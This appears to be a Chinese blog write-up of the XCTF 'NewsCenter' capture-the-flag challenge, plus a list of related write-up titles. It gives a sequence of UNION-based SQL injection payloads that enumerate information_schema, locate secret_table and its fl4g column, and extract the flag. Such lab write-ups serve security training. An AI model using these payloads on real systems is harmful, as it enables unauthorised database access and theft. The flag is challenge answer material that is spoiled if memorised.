攻防世界wp-newscenter
2020-02-01 07:27
375 查看
根据搜索条件,考虑题目为sql注入
1. 输入语句’ and 0 union select 1,2,3 from information_schema.tables#,查看数据库返回列数
查询结果说明,数据库返回的列数为3
2.查询数据库名称
’ and 0 union select 1,2,table_schema from information_schema.tables#,
查询结果可知,数据库名称为 news
3. 查询news数据库中的表:
’ and 0 union select 1,2,table_name from information_schema.tables where table_schema=‘news’#
发现secret_table
4.查询表中列名:
’ and 0 union select 1,2,column_name from information_schema.columns where table_schema=‘news’ and table_name=‘secret_table’#
发现关键字fl4g
5.查询fl4g
’ and 0 union select 1,2,fl4g from secret_table#
得到结果:QCTF{sq1_inJec7ion_ezzz}
- 点赞
- 收藏
- 分享
- 文章举报
相关文章推荐
- [wp] 攻防世界 ics-02
- [wp]攻防世界-bug
- [wp] 攻防世界 Web_php_include
- [wp] 攻防世界 baby_web
- XCTF攻防世界web进阶练习_ 1_NewsCenter
- [wp] 攻防世界 ics-04
- 攻防世界-IgniteMe WP
- [wp] 攻防世界 upload1
- 攻防世界逆向wp
- [wp] 攻防世界 Web_php_unserialize
- [wp] 攻防世界 isc-07
- [wp] 攻防世界-i-got-id-200
- 攻防世界 web进阶 NewsCenter
- [wp] 攻防世界 CISCN-2018-Final blgdel
- [wp] 攻防世界 Web_php_wrong_nginx_config
- XCTF攻防世界web新手练习_ 7_weak_auth
- 攻防世界 web题目 get_post
- 攻防世界——pwn_forgot
- 攻防世界-web writeup(xctf)
- 第39天:攻防世界-Mobile—黑客精神